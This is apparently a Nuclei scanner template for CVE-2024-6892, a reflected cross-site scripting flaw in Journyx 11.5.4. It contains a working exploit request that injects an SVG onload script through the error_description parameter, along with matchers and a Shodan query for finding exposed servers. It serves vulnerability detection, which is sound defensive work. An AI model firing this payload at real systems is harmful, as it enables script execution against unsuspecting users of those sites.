Vulnerability Description
Attackers can craft a malicious link that, once clicked, executes arbitrary JavaScript in the context of the Journyx web application.
id: CVE-2024-6892

info:
  name: Journyx 11.5.4 - Reflected Cross Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
  reference:
    - https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt
    - http://seclists.org/fulldisclosure/2024/Aug/7
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-6892
    cwe-id: CWE-81,CWE-79
    epss-score: 0.02827
    epss-percentile: 0.85668
    cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: journyx
    product: journyx
    shodan-query: html:"Journyx"
  tags: cve,cve2024,xss,journyx,seclists,vuln

http:
  - raw:
      - |
        GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<P>error <B><svg/onload=prompt('document.domain')></B></P>"
          - "journyx"
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 490a0046304402207cb8776a227be84abdbc159afceff745f836673b470fce7fcc256d071ffe78910220169cd50e3fed64fe187eae0d7405a2e13a1709a977f6ffbba23a7d88115af207:922c64590222798bb761d5b6d8e72950